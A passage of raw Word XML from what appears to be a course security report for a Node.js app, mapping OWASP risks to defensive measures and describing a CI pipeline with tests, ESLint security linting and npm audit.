        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OWASP category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Measure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A03 Injection (SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prepared statements for every query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/db.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A03 Injection (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>input validation + recursive output encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/security.js, src/app.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A07 Auth failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bcrypt hashes, JWT with exp/iss, algorithm allowlist, user reload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/app.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A01 Broken access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>notes always filtered by owner_id (no IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/db.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A05 Security misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helmet headers, 10 kB body limit, generic errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/app.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A02 / A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>no secrets in code, JWT_SECRET mandatory in production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src/app.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. CI/CD Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The pipeline is defined in .github/workflows/security-ci.yml and runs on every push and every pull request. It has three gating stages and one reporting stage.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>npm test (14 checks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>build fails on any failed check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ESLint 9 + eslint-plugin-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>build fails on any error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>build fails on high/critical in production dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JSON artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>uploaded for review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On the choice of scanners.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The manual suggests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>npm audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>snyk test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for JavaScript under SAST, and OWASP Dependency-Check or Snyk under SCA. The split is slightly unusual, because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>npm audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a composition analysis tool: it compares the installed dependency tree against advisory data and never reads the project's own code. This repository therefore uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ESLint with eslint-plugin-security for SAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it inspects our source, which is what static analysis means — and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>npm audit for SCA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, which queries the npm advisory database, the same corpus that Dependency-Check consults for JavaScript packages. Both are free, need no account or API key, and run in the pipeline on every push, which satisfies the grading criterion of at least one SAST/SCA tool running in CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Current state of both scanners on this codebase:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ npx eslint src scripts --format stylish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>✖ 1 problem (0 errors, 1 warning)</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npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
